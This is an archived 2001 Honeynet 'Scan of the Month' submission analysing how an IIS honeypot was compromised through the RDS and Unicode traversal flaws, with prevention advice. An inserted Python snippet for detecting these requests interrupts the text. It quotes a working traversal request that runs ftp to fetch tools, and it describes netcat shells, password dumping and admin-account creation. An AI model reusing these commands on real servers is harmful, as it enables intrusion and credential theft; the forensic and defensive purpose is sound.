From gmeltser@atstake.com Fri Apr 20 20:33:20 2001
Date: Fri, 20 Apr 2001 13:43:40 -0500
From: Gene Meltser
To: project@honeynet.org
Cc: gmeltser@atstake.com
Subject: Scan of the Month #14 submission

===========Scan Of the Month # 14==============

On Feb 4th, 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106. The only source of information available for analysis is the snort binary log file of the attack.

Answers

1. Which exploit(s) were used to attack the system?

The attacker utilizes a modification of the msadc.pl script developed by RFP (RFP 9902 RDS/IIS Advisory) as well as the Microsoft IIS extended unicode directory traversal vulnerability (MS00-057) to execute commands on the attacked server.

The RDS attack is identified by HTTP GETs to /msadc/msadc.dll, and subsequent HTTP POSTs to /msadc/msadc.dll/AdvancedDataFactory.Query. The msadc.pl script appears to be a stripped down version of the original, as the original would have made additional checks, such as a search for common DSNs and .mdbs, as well as a dictionary attack.

The unicode attack is identified by HTTP GETs to /msadc/.. containing unicode characters. The unicode attack allows an attacker to access any file, including files outside wwwroot, with IUSR_machinename rights.

The attacker also utilized netcat for outbound communication from the compromised host, and pdump.exe, a password dumping utility.

2. How were the exploits used to attack the system?

The attacker ran the modified msadc.pl script against the target system. This is visible from the analysis of the snort logs, which contain the string:

....--!ADM!ROX!YOUR!WORLD!..

The attacker makes repeated attempts at creating a text file containing scripted ftp commands and establishing an outbound ftp session via the RDS vulnerability.
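As an added example (my own code, not part of this submission or of the honeynet capture), the Python below turns the two identification signatures from answer 1 into a request-line classifier: it tags GET/POST traffic to the RDS dll and to AdvancedDataFactory.Query, and it decodes the overlong %C0%AF sequence the way unpatched IIS did, so the ../ traversal that is invisible in the raw encoded path is caught. The sample request lines are constructed, the msadcs.dll spelling is added alongside the msadc.dll named in the analysis, and the tag names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed request lines in the shape the analysis describes (not capture data).
SAMPLE_REQUESTS = [
    "POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1",
    "GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/"
    "common%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.0",
    "GET /index.html HTTP/1.0",
]
# The submission writes msadc.dll; the RDS component is msadcs.dll, so match both.
RDS_DLL = re.compile(r"^/msadc/msadcs?\.dll", re.IGNORECASE)

def decode_overlong(raw: bytes) -> str:
    """Map 0xC0/0xC1-led two-byte sequences (overlong, so never valid UTF-8) to the
    ASCII byte they encode, as unpatched IIS did: %C0%AF -> '/', %C1%9C -> '\\'."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            b, i = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F), i + 1
        out.append(chr(b))
        i += 1
    return "".join(out)

def escapes_root(path: str) -> bool:
    """True when '..' segments climb above the virtual root at any point."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        depth += -1 if seg == ".." else seg not in ("", ".")
        if depth < 0:
            return True
    return False

def classify(request_line: str) -> list:
    """Return the detection tags (names chosen here) for one HTTP request line."""
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    tags = []
    if RDS_DLL.match(path):
        tags.append("rds-probe")
        if method == "POST" and path.lower().endswith("/advanceddatafactory.query"):
            tags.append("rds-query")  # the channel msadc.pl uses to run commands
    raw = unquote_to_bytes(path)
    canonical = decode_overlong(raw)  # raw "..%C0%AF.." is not ".." until decoded
    if canonical != raw.decode("latin-1"):
        tags.append("overlong-utf8")
    if escapes_root(canonical):
        tags.append("traversal")
        if query.lower().startswith("/c+"):
            tags.append("command-exec")  # cmd.exe /c <command> via the query string
    return tags
```

Run over the snort-decoded request lines, the "traversal" tag only fires after canonicalization, which is exactly the check the vulnerable IIS performed in the wrong order.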
The attacker pipes ftp commands into a created text file, then executes ftp -s via the RDS vulnerability. After a few unsuccessful tries, including wrong passwords, the method is abandoned, and the tools are uploaded on to the host by establishing a scripted outbound ftp connection via the unicode vulnerability:

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom

The attacker uploads nc.exe, pdump.exe and samdump.dll on to the system, establishes a listening netcat on ports 6969 and 6968 that executes cmd1.exe on established connections, and connects via netcat.

3. What was done once access was granted?

@ The attacker cleans up the ftp scripts, as well as the attacker-created empty directory c:\fun, as visible in the 1st netcat connection log.

@ Attempts to dump passwords via pdump into yay.txt, "net session" into yay2.txt, and "net users" into heh.txt. This is done via RDS command piping, and viewing the resulting files via netcat.

@ Attempts are made to add the users IWAM_kenny and IUSR_kenny to the domain administrators group, as well as testuser as the system administrator, through the RDS exploit as well as through netcat.

@ A total of three successful netcat connections are made to the box, as the attacker syncs the SAM hive file via the "rdisk -s" command, then pipes the resulting updated backup file sam._ into heh.txt, which he grabs by placing it in wwwroot. The attacker also explores the system, including the /wiretrip directory, containing the original msadc1.pl and msadc2.pl scripts and whisker.tar.gz, as well as other tools by RFP, and successfully downloads whisker.tar.gz from the compromised host.

4. How could this attack have been prevented?

The attack could have been prevented by applying the appropriate patches, and in the case of the Unicode vulnerability, applying the patches released with the MS00-057 advisory, as well as actively monitoring for subsequent patch releases.
If Microsoft RDS is not needed on the system, disable RDS by deleting the unnecessary examples and dlls from the server, such as msadc.dll. Further, firewall rulesets should be tightened to deny outbound connections on arbitrary ports, and to deny outbound port 80 if the session is not already established.

5. How much time was spent on analysis?

Total time: 16 Hours.

Bonus: Did the attacker know it was a honeypot? Why or why not?

The attacker knew it was a honeypot, as is evident from the 3rd connection's netcat log:

C:\>
C:\>echo best honeypot i've seen till now :) > rfp.txt

I believe the attacker realized he was on the honeypot for a variety of reasons.

1. The above statement implies the attacker has been on a honeypot before, thus he/she knows what a honeypot looks like.

2. The attacked system exhibits characteristics of "soft on the outside, hard on the inside", which is inconsistent and highly suspicious. The attacker gained access to the system through a well known and old vulnerability, suggesting an unpatched default installation. However, when the attacker created and subsequently tried to delete a file in \wwwroot, access was denied, suggesting explicitly set permissions on the directory tree. This is inconsistent with the default install.

3. The compromised server contains numerous references to RFP, as evident by the \wiretrip directory, where RFP's guestbook is located, as well as the \exploits directory.

---
Gene Meltser
@stake, Inc.
04/09/2000